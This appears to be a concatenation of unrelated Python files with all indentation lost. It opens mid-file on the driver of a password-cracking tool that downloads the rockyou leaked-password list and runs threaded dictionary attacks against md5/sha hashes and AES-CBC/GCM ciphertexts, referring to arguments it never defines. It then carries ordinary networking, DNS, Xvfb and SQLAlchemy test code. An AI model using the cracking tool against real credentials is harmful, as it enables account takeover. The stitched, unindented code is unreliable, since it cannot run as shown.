parsie.add_argument("-at", "--automatew", help="Automate wordlist origin. Default is rockyou.txt. Specify a GitHUB directory (for instance sth/sth/sth.txt)", default="danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou-75.txt", required=False)
parsie.add_argument("-hs", "--hashsum", help="Specify your hashsum value, input. If you want to try more try by splitting them with coma. For instance, --hashsum hasha, hashb, hashc.", required=False)
parsie.add_argument("-a", "--alogirthm", help="Algoirthms: sha256, sha512, md5.", required=False)
parsie.add_argument("-p", "--password", help="Provide an argument: --password download (to get automatically passwords, or leave it to None.)", default=None, required=False)
parsie.add_argument("-l", "--limit", help="Specify an limit for the password attempts, words.", default=100, required=False)
parsie.add_argument("-v", "--view", help="View found credentials at the end.", default=None, required=False)
parsie.add_argument("-cb", "--ciphers", help="Specify ciphers that were included in a sequence. For instance -> aesgcm -> aescbc -> hash. You can browse it like - 1 (aesgcm) 2(aescbc) 3(hash) (always the hash should be included in the end), for instance: 2.1.3\r\x0A", default=None, required=False)
parsie.add_argument("-ck", "--ckey", help="Specify cipher keys. They should be splitted by column (the vector and key), for instance sixteenbytesssss:sixteenbytessss2.", default=None, required=False)
print("\x0A" + "Starting. . . . . . . .\r\x0A")
if parsie.parse_args().password == None:
if "," in parsie.parse_args().automatew:
list_ = []
for items in parsie.parse_args().automatew.split(","):
for items in attribs.get_words(limit=int(parsie.parse_args().limit), origin=items, depth=int(parsie.parse_args().downloaddepth)):
list_.append(items)
print('[DATA] Total gathered %d!'%(len(list_,)))
else:
list_ = attribs.get_words(limit=int(parsie.parse_args().limit), origin=parsie.parse_args().automatew, depth=int(parsie.parse_args().downloaddepth))
else:
list_ = attribs.get_words_filebin(limit=int(parsie.parse_args().limit), file=parsie.parse_args().password)
print("Total words downloaded. . . . . . .: %s"%(len(list_,)))
if parsie.parse_args().cbc != None:
print("Starting CBC brute force attack. . . . .")
if "," in parsie.parse_args().cbc:
th_ = 1
for items in parsie.parse_args().cbc.split(","):
print("[DATA] Starting %s thread!"%(th_))
def __():
attck_ = StartCBC(list=list_, sum=items, cipher_keys=parsie.parse_args().ckey)
from threading import Thread
for io in range(1):
Thread(target=__).start()
th_ += 1
exit()
else:
attck_ = StartCBC(list=list_, sum=parsie.parse_args().cbc, cipher_keys=parsie.parse_args().ckey)
exit()
if parsie.parse_args().gcm != None:
print("[DATA] Starting GCM brute force attack. . . . .")
if "," in parsie.parse_args().gcm:
for items in parsie.parse_args().gcm.split(","):
outie_ = StartGCM(list=list_, sum=items, cipher_keys=parsie.parse_args().ckey)
exit()
else:
outie_ = StartGCM(list=list_, sum=parsie.parse_args().gcm, cipher_keys=parsie.parse_args().ckey)
exit()
orig_hash = parsie.parse_args().hashsum
if parsie.parse_args().hashsum != None and "," in parsie.parse_args().hashsum:
for hashsum in parsie.parse_args().hashsum.split(","):
act_ = len(attribs.return_sample(algo=parsie.parse_args().alogirthm))
if act_ != len(hashsum):
raise IncorrectAlg("Incorrect algorithm provided! This is %s bytes, required %s!"%(len(parsie.parse_args().hashsum), act_))
else:
act_ = len(attribs.return_sample(algo=parsie.parse_args().alogirthm))
if act_ != len(parsie.parse_args().hashsum):
raise IncorrectAlg("Incorrect algorithm provided! This is %s bytes, required %s!"%(len(parsie.parse_args().hashsum), act_))
if parsie.parse_args().ciphers != None:
list_ = FormList(target=list_, list_=parsie.parse_args().ckey, times=parsie.parse_args().ciphers.replace("3", ""))
if parsie.parse_args().automode != None:
memory = {}
bea = 0
reas = {}
for items in attribs.top_lists:
memory[bea] = attribs.get_words(limit=1000000, origin=items, depth=1000)
reas[items] = items
bea += 1
for items in memory:
def multi():
att_ = attribs(passwords=memory[items], hashsum=parsie.parse_args().hashsum, algorithm=parsie.parse_args().alogirthm, view="1", wr="Automode")
from threading import Thread
for io in range(1):
Thread(target=multi).start()
if "," in orig_hash:
for hashsum in orig_hash.split(","):
attribs(passwords=list_, hashsum=hashsum, algorithm=parsie.parse_args().alogirthm, view=parsie.parse_args().view)
input("\r\x0A\r\x0A")
attribs.clear()
else:
attribs(passwords=list_, hashsum=parsie.parse_args().hashsum, algorithm=parsie.parse_args().alogirthm, view=parsie.parse_args().view, wr=parsie.parse_args().automatew)
if __name__ == "__main__":
__main__()
|
conn.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*
# Copyright: [CUP] - See LICENSE for details.
# Authors: Guannan Ma
"""
:descrition:
connection related module
1. There's only 1 thread reading/receiving data from the interface.
2. There might have more than 1 thred writing data into the network
queue. 1 thread per context(ip, port).
Notice that _do_write will only TRY to send out some data. It might
encounter TCP/IP stack full of data in the SEND buffer-queue of
the network interface
"""
import os
import copy
import socket
import select
import errno
import time
import threading
import traceback
try:
import Queue as queue # pylint: disable=F0401
except ImportError:
import queue # pylint: disable=F0401
import cup
from cup import log
from cup import err as cuperr
from cup.util import misc
from cup.util import threadpool
from cup.services import executor
from cup.net.async import msg as async_msg
from cup.net.async import context as sockcontext
__all__ = [
'CConnectionManager'
]
def _try_get_peer_info(sock):
try:
peer = sock.getpeername()
except socket.error as error:
peer = ('Error happened', str(error))
except Exception as error:
peer = ('_try_get_peer_info error happend', str(error))
return peer
# pylint: disable=R0902
class CConnectionManager(object):
"""
connaddr. Convert ip:port into a 64-bit hex.
"""
NET_RW_SIZE = 131072
# NET_RW_SIZE = 4096
class QueueError(Exception):
"""
internal queue error for CConnectionManager class
"""
def __init__(self, msg):
super(self.__class__, self).__init__()
self._msg = msg
def __repr__(self):
return self._msg
def __init__(self, ip, bindport, thdpool_param):
# TODO: Close idle socket after 30 mins with no data sent or received.
self._conns = {}
self._bind_port = bindport
self._bind_ip = ip
self._epoll = select.epoll()
self._stopsign = False
self._bind_sock = None
self._fileno2context = {}
self._context2fileno_peer = {}
self._peer2context = {}
min_thds, max_thds = thdpool_param
self._thdpool = threadpool.ThreadPool(
min_thds, max_thds, name='network_write_read')
self._recv_queue = queue.PriorityQueue(0)
self._stopsign = False
self._recv_msg_ind = 0
self._mlock = threading.Lock()
# _needack_context_queue
# infinite queue TODO: may change it in the future
self._needack_context_queue = queue.Queue()
self._dict_lock = threading.Lock()
self._needack_context_dict = {}
self._executor = executor.ExecutionService(
#int('queue_exec_thdnum'), # todo num?
#int('queue_delay_exe_thdnum') # todo num?
3,
4
)
self._type_man = async_msg.CMsgType()
self._type_man.register_types(async_msg.MSG_TYPE2NUM)
@classmethod
def _set_sock_params(cls, sock):
cup.net.set_sock_keepalive_linux(sock, 1, 3, 3)
cup.net.set_sock_linger(sock)
cup.net.set_sock_quickack(sock)
cup.net.set_sock_reusable(sock, True)
@classmethod
def _set_sock_nonblocking(cls, sock):
sock.setblocking(0)
@classmethod
def _epoll_write_params(cls):
return (select.EPOLLET | select.EPOLLOUT | select.EPOLLERR)
@classmethod
def _epoll_read_params(cls):
return (select.EPOLLET | select.EPOLLIN | select.EPOLLERR)
def get_needack_dict(self):
"""
get neekack dict
"""
return self._needack_context_dict
def push_msg2needack_queue(self, msg):
"""
get neekack dict
"""
log.debug('push ack ok msg into needack_queue.')
self._needack_context_queue.put(msg)
def bind(self):
"""
bind the ip:port
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._set_sock_params(sock)
sock.bind((self._bind_ip, self._bind_port))
self._set_sock_nonblocking(sock)
log.info(
'bind port info:(ip:%s, port:%s)' % (
self._bind_ip, self._bind_port
)
)
self._epoll.register(
sock.fileno(),
select.EPOLLIN | select.EPOLLET | select.EPOLLOUT | select.EPOLLERR
)
self._bind_sock = sock
def push_msg2sendqueue(self, msg):
"""
push msg into the send queue
"""
ret = 0
if msg is None:
log.warn('put a None into msg send queue. return')
ret = -1
return ret
valid, errmsg = msg.is_valid4send(msg)
if not valid:
log.error('failed to send msg as msg is not valid to send')
return -1
flag = msg.get_flag()
peer = msg.get_to_addr()[0]
new_created = False
context = None
sock = None
if isinstance(msg, async_msg.CNeedAckMsg):
log.debug('CNeedAckMsg is to be sent. msg_type:%d,'
'msg_flag:%d, msg_dest:%s, uniqid:%d' %
(
msg.get_msg_type(),
msg.get_flag(),
str(msg.get_to_addr()),
msg.get_uniq_id()
)
)
# no need head by default
# msg.set_need_head(b_need=False)
if msg.get_last_retry_time() is None:
msg.set_last_retry_time(time.time())
# if not in the self._needack_context_dict
if msg.get_retry_times() <= 0:
self._needack_context_queue.put(msg)
try:
context = self._peer2context[peer]
except KeyError:
log.info('To create a new context for the sock:{0}'.format(
peer)
)
self._mlock.acquire()
if peer not in self._peer2context:
sock = self.connect(peer)
if sock is not None:
context = sockcontext.CConnContext()
context.set_conn_man(self)
context.set_sock(sock)
context.set_peerinfo(peer)
fileno = sock.fileno()
self._peer2context[peer] = context
self._fileno2context[fileno] = context
self._context2fileno_peer[context] = (fileno, peer)
log.info('created context for the new sock')
ret = 0
try:
self._epoll.register(
sock.fileno(), self._epoll_write_params()
)
except Exception as error: # pylint: disable=W0703
log.warn(
'failed to register the socket fileno, err_msg:%s,'
'perinfo:%s:%s. To epoll modify it' %
(str(error), peer[0], peer[1])
)
self._epoll.modify(
sock.fileno(), self._epoll_write_params()
)
else:
log.error(
'failed to post msg. Connect failed. peer info:{0}.'
' msg_type:{1}'.format(
str(peer), msg.get_msg_type()
)
)
ret = -1
else:
context = self._peer2context[peer]
self._mlock.release()
else:
context = self._peer2context[peer]
if ret != 0:
return ret
if not context.is_detroying():
if context.put_msg(flag, msg) == 0:
ret = 0
# set up last modify
else:
ret = -1
log.debug('start handle new send.')
self._handle_new_send(context)
return ret
def connect(self, peer):
"""
:param peer:
ip:port
"""
log.info('to connect to peer:{0}'.format(peer))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._set_sock_params(sock)
try:
ret = sock.connect_ex(peer)
if ret != 0:
log.warn('connect failed, peer:{0}'.format(peer))
return None
if sock.getpeername() == sock.getsockname():
log.warn('connect failed, seems connected to self')
sock.close()
return None
self._set_sock_nonblocking(sock)
log.info('connect peer success')
return sock
except socket.error as error:
log.warn(
'failed to connect to %s:%s. Error:%s' %
(peer[0], peer[1], str(error))
)
sock.close()
return None
else:
sock.close()
return None
def _handle_new_conn(self, newsock, peer):
self._mlock.acquire()
self._set_sock_params(newsock)
self._set_sock_nonblocking(newsock)
context = sockcontext.CConnContext()
context.set_sock(newsock)
context.set_conn_man(self)
context.set_peerinfo(peer)
self._epoll.register(
newsock.fileno(), select.EPOLLIN | select.EPOLLET | select.EPOLLERR
)
self._fileno2context[newsock.fileno()] = context
self._peer2context[peer] = context
self._context2fileno_peer[context] = (newsock.fileno(), peer)
log.info('a new connection: %s:%s' % (peer[0], peer[1]))
self._mlock.release()
def cleanup_error_context(self, context):
"""clean up error context"""
def _cleanup_context(send_queue, peerinfo):
"""cleanup context"""
log.debug('to cleanup socket, peer:{0}'.format(peerinfo))
log.debug(
'cleanup: send_queue of socket size:{0}'.format(
send_queue.qsize()
)
)
while True:
try:
item = send_queue.get_nowait()
msg = item[2]
del msg
except queue.Empty:
break
if context is None:
return
self._mlock.acquire()
try:
peerinfo = context.get_peerinfo()
log.info(
'handle socket reset by peer, to close the socket:%s:%s' %
(peerinfo[0], peerinfo[1])
)
fileno_peer = self._context2fileno_peer[context]
try:
sock = context.get_sock()
sock.close()
context.set_sock(None)
except socket.error as error:
log.info(
'failed to close the socket, err_msg:%s' % str(error)
)
except Exception as error:
log.warn('failed to close socket:{0}'.format(error))
try:
self._epoll.unregister(fileno_peer[0])
except Exception as error: # pylint: disable=W0703
log.warn(
'epoll unregister error:%s, peerinfo:%s' %
(str(error), str(fileno_peer[1]))
)
del self._fileno2context[fileno_peer[0]]
del self._peer2context[fileno_peer[1]]
del self._context2fileno_peer[context]
log.info('socket closed')
except Exception as error:
pass
finally:
self._mlock.release()
# pylint: disable=W0212
self._thdpool.add_1job(_cleanup_context, context._send_queue, peerinfo)
def close_socket(self, msg, recv_socket):
"""
close socket by msg
"""
peer = None
try:
if not recv_socket:
peer = msg.get_to_addr()[0]
else:
peer = msg.get_from_addr()[0]
context = self._peer2context.get(peer)
if context is not None:
self.cleanup_error_context(context)
else:
log.warn('conn manager close socket failed:{0}'.format(
peer)
)
except Exception as err:
log.warn('failed to close socket:{1}, recv_socket:{0}'.format(
recv_socket, err)
)
return
def poll(self):
"""
start to poll
"""
self._thdpool.start()
self._executor.run()
log.info('thdpool and executor start')
misc.check_not_none(self._bind_sock)
self._bind_sock.listen(10)
self._executor.delay_exec(
2, # todo set the check_time to ?
self.do_check_msg_ack_loop,
urgency=executor.URGENCY_HIGH
)
while not self._stopsign:
try:
events = self._epoll.poll(1)
except IOError as err:
if err.errno == errno.EINTR:
return
raise err
# log.debug('start to poll')
for fileno, event in events:
# if it comes from the listen port, new conn
if fileno == self._bind_sock.fileno():
newsock, addr = self._bind_sock.accept()
self._handle_new_conn(newsock, addr)
elif event & select.EPOLLIN:
try:
self._handle_new_recv(self._fileno2context[fileno])
except KeyError:
log.info('socket already closed')
elif event & select.EPOLLOUT:
try:
self._handle_new_send(self._fileno2context[fileno])
except KeyError:
log.info('socket already closed')
elif (event & select.EPOLLHUP) or (event & select.EPOLLERR):
# FIXME: consider if we need to release net msg resources
if event & select.EPOLLHUP:
log.info('--EPOLLHUP--')
else:
log.info('--EPOLLERR--')
try:
self.cleanup_error_context(
self._fileno2context[fileno]
)
except KeyError:
log.info('socket already closed')
def dump_stats(self):
"""
dump stats
"""
self._thdpool.dump_stats()
def _async_stop(self, force_stop):
"""
to async stop thread pool and executor"""
stop_pool = threading.Thread(
target=self._thdpool.stop, args=(force_stop, )
)
stop_pool.start()
stop_executor = threading.Thread(
target=self._executor.stop, args=(force_stop, )
)
stop_executor.start()
stop_pool.join()
stop_executor.join()
def stop(self, force_stop=False):
"""
stop the connection manager
"""
log.info('to stop the connection manager')
self._stopsign = True
self._async_stop(force_stop)
log.info('connection manager stopped')
def get_recv_msg_ind(self):
"""
get recv msg ind
"""
tmp = self._recv_msg_ind
self._recv_msg_ind += 1
return tmp
def get_recv_queue(self):
"""
get recving_msg queue
"""
return self._recv_queue
def get_recv_msg(self):
"""
get recv msg from queue
"""
log.debug('to fetch a msg from recv_queue for handle function')
try:
# should use block-mode, othwersie the while loop in the upper
# code scope will crazily occupy a full cpu-core capacity.
msg = self._recv_queue.get(block=True, timeout=0.5)[1]
except queue.Empty as error:
msg = None
except TypeError as error:
log.error('type error, seems received SIGTERM, err:{0}'.format(
error)
)
msg = None
except Exception as error:
msg = 'Catch a error that I cannot handle, err_msg:%s' % error
log.error(msg)
log.error(type(error))
raise CConnectionManager.QueueError(msg)
return msg
def _handle_new_recv(self, context):
self._thdpool.add_1job(self.read, context)
# self.read(context)
def _finish_read_callback(self, succ, result):
context = result
if context.is_detroying():
# destroy the context and socket
context.release_readlock()
try:
self.cleanup_error_context(context)
except KeyError:
pass
else:
self._epoll.modify(
context.get_sock().fileno(), select.EPOLLIN | select.EPOLLET
)
context.release_readlock()
def read(self, context):
"""
read with conn context
"""
if context.is_detroying():
log.debug('The context is being destroyed. return')
return
if not context.try_readlock():
return
try:
self._do_read(context)
self._finish_read_callback(True, context)
except Exception as error:
context.to_destroy()
log.info('read error occur, error type:{0}, content:{1}'.format(
type(error), error)
)
self.cleanup_error_context(context)
log.warn(traceback.format_exc())
self._finish_read_callback(False, context)
def _do_read(self, context):
sock = context.get_sock()
data = None
context.move2recving_msg()
while self._stopsign is not True:
try:
data = sock.recv(self.NET_RW_SIZE)
except socket.error as error:
err = error.args[0]
if err == errno.EAGAIN:
log.debug(
'EAGAIN happend, peer info %s' %
context.get_context_info()
)
return context
elif err == errno.EWOULDBLOCK:
log.info(
'EWOULDBLOCK happend, context info %s' %
context.get_context_info()
)
return context
else:
log.debug(
'Socket error happend, error:%s, peer info %s' %
(str(error), context.get_context_info())
)
context.to_destroy()
return context
except Exception as error:
log.critical(
'Socket error happend, error:%s, peer info %s' %
(str(error), context.get_context_info())
)
context.to_destroy()
return context
data_len = len(data)
if data_len == 0:
# socket closed by peer
context.to_destroy()
return context
context.do_recv_data(data, data_len)
del data
def _finish_write_callback(self, succ, result):
"""finish write callback"""
context = result
# You cannot do things below as getpeername will block if the conn
# has problem!!!!! - Guannan
# try:
# context.get_sock().getpeername()
# except socket.error as error:
# log.debug('Seems socket failed to getpeername:%s' % str(error))
# context.to_destroy()
if context is not None and context.is_detroying():
# destroy the context and socket
context.release_writelock()
try:
self.cleanup_error_context(context)
# pylint: disable=W0703
except Exception as error:
log.warn('context destroying encounters error,'
'skip it:{0}'.format(error)
)
else:
# log.debug('to epoll modify')
epoll_write_params = self._epoll_write_params()
context.release_writelock()
# context hash locked the writing.
# guarantee there's only 1 thread for context writing.
def _handle_new_send(self, context):
"""
handle new send message
"""
if context is None:
log.debug('conetext is none')
return
self._thdpool.add_1job(self.add_write_job, context)
def _do_write(self, context):
"""write into interface sending buffer"""
sock = context.get_sock()
msg = context.try_move2next_sending_msg()
if msg is None:
log.debug('send queue is empty, quit the _do_write thread')
return context
# log.debug('To enter write loop until eagin')
# pylint:disable=w0212
while not self._stopsign:
data = msg.get_write_bytes(self.NET_RW_SIZE)
log.debug('msg get_write_bytes_len to be sent: %d' % len(data))
try:
succ_len = sock.send(data)
msg.seek_write(succ_len)
except cuperr.AsyncMsgError as error:
log.debug('has seek out of msg len, continue')
except socket.error as error:
err = error.args[0]
if err == errno.EAGAIN:
log.debug(
'EAGAIN happend, context info %s' %
context.get_context_info()
)
return context
elif err == errno.EWOULDBLOCK:
log.debug(
'EWOULDBLOCK happend, context info %s' %
context.get_context_info()
)
return context
else:
log.warn(
'Socket error happend. But its not eagin,error:%s,\
context info %s, errno:%s' %
(str(error), context.get_context_info(), err)
)
context.to_destroy()
break
except Exception as error:
log.error(
'Socket error happend, error:%s, context info %s, trace:%s' %
(str(error), context.get_context_info(), traceback.format_exc())
)
context.to_destroy()
break
finally:
del data
if msg.is_msg_already_sent():
log.info('sent out a msg uniqid:{0}'.format(util.netmsg_tostring(msg)))
# if we have successfully send out a msg. Then move to next one
msg = context.try_move2next_sending_msg()
if msg is None:
break
return context
def add_write_job(self, context):
"""
add network write into queue
"""
if context is None:
return
try:
peerinfo = context.get_peerinfo()
# pylint: disable=W0703
except Exception as error:
log.info('failed to get peerinfo, return')
return
if not context.try_writelock():
log.debug(
'Another thread is writing the context, return. '
'Peerinfo:%s:%s' %
(peerinfo[0], peerinfo[1])
)
return
if context.is_detroying():
log.info(
'The context is being destroyed, i will do nothing. '
'Peerinfo:%s:%s' %
(peerinfo[0], peerinfo[1])
)
return
try:
# log.debug('write in add_write_job')
self._do_write(context)
self._finish_write_callback(True, context)
# pylint: disable=W0703
except Exception as error:
log.debug(
'seems error happend for context:%s Peerinfo:%s:%s\n, %s' %
(str(error), peerinfo[0], peerinfo[1], traceback.format_exc())
)
self._finish_write_callback(False, context)
def _get_resend_msg_key(self, ip, port, uniq_id):
"""generate resend msg key"""
key = '{0}_{1}_{2}'.format(ip, port, uniq_id)
return key
def _check_needack_queue(self):
"""
check needack_queue
"""
log.debug('start check needack_queue')
msg_item = None
ack_flag = async_msg.MSG_FLAG2NUM['FLAG_ACK']
while True:
msg_item = None
try:
msg_item = self._needack_context_queue.get_nowait()
except queue.Empty:
log.debug('no need ack msg found yet')
break
ack_success = False
toaddr = None
uniq_id = msg_item.get_uniq_id()
toaddr = msg_item.get_to_addr()[0]
if msg_item.get_flag() & ack_flag == ack_flag:
# if msg_item is a ack msg
log.info(
'msgack received, stop resending '
'msguniq_id:{0}'.format(uniq_id)
)
msg_item.set_resend_flag(async_msg.MSG_RESEND_SUCCESS)
toaddr = msg_item.get_from_addr()[0]
ack_success = True
to_ip = toaddr[0]
to_port = toaddr[1]
msg_key = self._get_resend_msg_key(to_ip, to_port, uniq_id)
if ack_success:
if msg_key in self._needack_context_dict:
last_msg = self._needack_context_dict[msg_key]
del self._needack_context_dict[msg_key]
self._executor.queue_exec(
last_msg.get_callback_function(),
executor.URGENCY_NORMAL,
last_msg, True
)
else:
log.warn(
'got duplicate ack-msg, msg_id:{0}'.format(uniq_id)
)
continue
# not ack_success + not in context_dict
if msg_key not in self._needack_context_dict:
self._needack_context_dict[msg_key] = msg_item
time_out_list = []
for key in self._needack_context_dict.keys():
msg_item = self._needack_context_dict[key]
msg_flag = msg_item.get_resend_flag()
msg_info = 'msg_type:%d, msg_flag:%d, msg_dest:%s,uniqid:%d' % (
msg_item.get_msg_type(),
msg_item.get_flag(),
str(msg_item.get_to_addr()),
msg_item.get_uniq_id()
)
if msg_flag == async_msg.MSG_RESEND_SUCCESS:
time_out_list.append(key)
log.debug(
'del succ-msg from resending queue: {0}'.format(msg_info)
)
elif msg_flag == async_msg.MSG_RESENDING_FLAG:
msg_total_timeout = msg_item.get_total_timeout()
# if msg resending timeouts
if msg_total_timeout <= 0:
msg_item.set_resend_flag(async_msg.MSG_TIMEOUT_TO_DELETE)
log.error(
'timeout, failed to get ack for netmsg:{0}'.format(
msg_info)
)
time_out_list.append(key)
else:
msg_last_retry_time = msg_item.get_last_retry_time()
msg_retry_interval = msg_item.get_retry_interval()
now = time.time()
elapse_time = now - msg_last_retry_time
if elapse_time >= msg_retry_interval:
# update total_timeout
msg_item.set_total_timeout(
msg_total_timeout - elapse_time
)
msg_item.set_last_retry_time(now)
log.info('to resend CNeedAckMsg: {0}'.format(msg_info))
msg_item.pre_resend()
msg_item.add_retry_times()
self.push_msg2sendqueue(msg_item)
for key in time_out_list:
msg_item = self._needack_context_dict[key]
del self._needack_context_dict[key]
self._executor.queue_exec(
msg_item.get_callback_function(),
executor.URGENCY_NORMAL,
msg_item, False
)
def do_check_msg_ack_loop(self):
"""
check msg ack loop
"""
log.debug('start check msg ack info.')
self._check_needack_queue()
self._executor.delay_exec(
3, # todo set the check_time to ?
self.do_check_msg_ack_loop,
urgency=executor.URGENCY_HIGH
)
# vi:set tw=0 ts=4 sw=4 nowrap fdm=indent
|
dns_v2.py
|
import threading
import socket
import datetime
def resolveDns(hostnames):
for host in hostnames:
try:
print(f"{host}: {socket.gethostbyname(host)}")
except Exception as e:
print(f"{host}: {e}")
continue
if __name__ == "__main__":
filename = "hostnames.txt"
with open(filename) as file:
hostnames = file.readlines()
hostnames = [line.rstrip() for line in hostnames]
start = datetime.datetime.now()
threads = list()
chunksize = 100
chunks = [hostnames[i:i + chunksize] for i in range(0, len(hostnames), chunksize)]
for chunk in chunks:
x = threading.Thread(target=resolveDns, args=(chunk,))
threads.append(x)
x.start()
for chunk, thread in enumerate(threads):
thread.join()
end = datetime.datetime.now()
duration = end - start
print(" ")
print(f"Time taken: {duration}")
print("")
|
MyMultiportUdpListener.py
|
#!/usr/bin/python3
import time
import threading
import socketserver
class MyMultiportUdpListener:
def __init__(self, portlist):
self.portlist = portlist
self.start_listeners()
def start_udpserv(self, port):
self.MySinglePortListener(('127.0.0.1', port), self)
def start_listeners(self):
# create threads to listen on each port
self.threads = [
threading.Thread(target=self.start_udpserv, args=(p, ))
for p in self.portlist
]
# start them
print('starting threads...')
for t in self.threads:
t.daemon = True # non blocking
t.start()
def multiport_callback(self, data, server_address):
print(f'got some data {data} from {server_address}\n')
# store it, etc do as you wish
class MySinglePortListener(socketserver.ThreadingUDPServer):
class MyUDPHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request[0].strip()
socket = self.request[1]
# print(
# f'client {self.client_address}\n\twrote {data}\n\tto {self.server.server_address}'
# )
# send back message in uppercase as confirmation (comment out if not needed)
# socket.sendto(data.upper(), self.client_address)
# call server callback function with data
self.server.single_port_callback(data)
def __init__(self, server_address, multiport_listener):
# store reference to parent class
self.multiport_listener = multiport_listener
# turn on allow reuse ports
socketserver.ThreadingUDPServer.allow_reuse_address = 1
# instantiate server
socketserver.ThreadingUDPServer.__init__(self, server_address,
self.MyUDPHandler)
# now serve forever
print(f'now listening on {self.server_address}')
self.serve_forever()
def single_port_callback(self, data):
# do something single port wise if you want here...
# otherwise pass data to higher server
self.multiport_listener.multiport_callback(data,
self.server_address)
if __name__ == '__main__':
# ports to listen to
ports = [6941, 6942, 6943]
# listen
MyMultiportUdpListener(portlist=ports)
# stay active until ctrl+c input
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print('exiting now...')
|
xvfb.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs tests with Xvfb and Openbox on Linux and normally on other platforms."""
import os
import os.path
import platform
import signal
import subprocess
import sys
import threading
import test_env
def _kill(proc, send_signal):
"""Kills |proc| and ignores exceptions thrown for non-existent processes."""
try:
os.kill(proc.pid, send_signal)
except OSError:
pass
def kill(proc, timeout_in_seconds=10):
"""Tries to kill |proc| gracefully with a timeout for each signal."""
if not proc or not proc.pid:
return
_kill(proc, signal.SIGTERM)
thread = threading.Thread(target=proc.wait)
thread.start()
thread.join(timeout_in_seconds)
if thread.is_alive():
print >> sys.stderr, 'Xvfb running after SIGTERM, trying SIGKILL.'
_kill(proc, signal.SIGKILL)
thread.join(timeout_in_seconds)
if thread.is_alive():
print >> sys.stderr, 'Xvfb running after SIGTERM and SIGKILL; good luck!'
def run_executable(cmd, env, stdoutfile=None):
"""Runs an executable within Xvfb on Linux or normally on other platforms.
If |stdoutfile| is provided, symbolization via script is disabled and stdout
is written to this file as well as to stdout.
Returns the exit code of the specified commandline, or 1 on failure.
"""
# It might seem counterintuitive to support a --no-xvfb flag in a script
# whose only job is to start xvfb, but doing so allows us to consolidate
# the logic in the layers of buildbot scripts so that we *always* use
# xvfb by default and don't have to worry about the distinction, it
# can remain solely under the control of the test invocation itself.
use_xvfb = True
if '--no-xvfb' in cmd:
use_xvfb = False
cmd.remove('--no-xvfb')
if sys.platform == 'linux2' and use_xvfb:
if env.get('_CHROMIUM_INSIDE_XVFB') == '1':
openbox_proc = None
xcompmgr_proc = None
try:
# Some ChromeOS tests need a window manager.
openbox_proc = subprocess.Popen('openbox', stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env)
# Some tests need a compositing wm to make use of transparent visuals.
xcompmgr_proc = subprocess.Popen('xcompmgr', stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env)
return test_env.run_executable(cmd, env, stdoutfile)
except OSError as e:
print >> sys.stderr, 'Failed to start Xvfb or Openbox: %s' % str(e)
return 1
finally:
kill(openbox_proc)
kill(xcompmgr_proc)
else:
env['_CHROMIUM_INSIDE_XVFB'] = '1'
if stdoutfile:
env['_XVFB_EXECUTABLE_STDOUTFILE'] = stdoutfile
xvfb_script = __file__
if xvfb_script.endswith('.pyc'):
xvfb_script = xvfb_script[:-1]
# TODO(crbug.com/932240): Propagate signals properly.
return subprocess.call([
'xvfb-run', '-a', "--server-args=-screen 0 "
"1280x800x24 -ac -nolisten tcp -dpi 96 "
"+extension RANDR", xvfb_script] + cmd, env=env)
else:
return test_env.run_executable(cmd, env, stdoutfile)
def main():
USAGE = 'Usage: xvfb.py [command [--no-xvfb] args...]'
if len(sys.argv) < 2:
print >> sys.stderr, USAGE
return 2
# If the user still thinks the first argument is the execution directory then
# print a friendly error message and quit.
if os.path.isdir(sys.argv[1]):
print >> sys.stderr, (
'Invalid command: \"%s\" is a directory' % sys.argv[1])
print >> sys.stderr, USAGE
return 3
stdoutfile = os.environ.get('_XVFB_EXECUTABLE_STDOUTFILE')
if stdoutfile:
del os.environ['_XVFB_EXECUTABLE_STDOUTFILE']
return run_executable(sys.argv[1:], os.environ.copy(), stdoutfile)
if __name__ == "__main__":
sys.exit(main())
|
test_memusage.py
|
import decimal
import gc
import itertools
import multiprocessing
import weakref
import sqlalchemy as sa
from sqlalchemy import ForeignKey
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy import Unicode
from sqlalchemy import util
from sqlalchemy.engine import result
from sqlalchemy.orm import aliased
from sqlalchemy.orm import clear_mappers
from sqlalchemy.orm import configure_mappers
from sqlalchemy.orm import declarative_base
from sqlalchemy.orm import join as orm_join
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import Load
from sqlalchemy.orm import relationship
from sqlalchemy.orm import selectinload
from sqlalchemy.orm import Session
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import subqueryload
from sqlalchemy.orm.session import _sessions
from sqlalchemy.processors import to_decimal_processor_factory
from sqlalchemy.sql import column
from sqlalchemy.sql import util as sql_util
from sqlalchemy.sql.visitors import cloned_traverse
from sqlalchemy.sql.visitors import replacement_traverse
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from sqlalchemy.testing.util import gc_collect
from ..orm import _fixtures
class A(fixtures.ComparableEntity):
pass
class B(fixtures.ComparableEntity):
pass
class ASub(A):
pass
def assert_cycles(expected=0):
def decorate(fn):
def go():
fn() # warmup, configure mappers, caches, etc.
gc_collect()
gc_collect()
gc_collect() # multiple calls seem to matter
# gc.set_debug(gc.DEBUG_COLLECTABLE)
try:
return fn() # run for real
finally:
unreachable = gc_collect()
assert unreachable <= expected
gc_collect()
return go
return decorate
def profile_memory(
maxtimes=250, assert_no_sessions=True, get_num_objects=None
):
def decorate(func):
# run the test N times. if length of gc.get_objects()
# keeps growing, assert false
def get_objects_skipping_sqlite_issue():
# pysqlite keeps adding weakref objects which only
# get reset after 220 iterations. We'd like to keep these
# tests under 50 iterations and ideally about ten, so
# just filter them out so that we get a "flatline" more quickly.
if testing.against("sqlite+pysqlite"):
return [
o
for o in gc.get_objects()
if not isinstance(o, weakref.ref)
]
else:
return gc.get_objects()
def profile(queue, func_args):
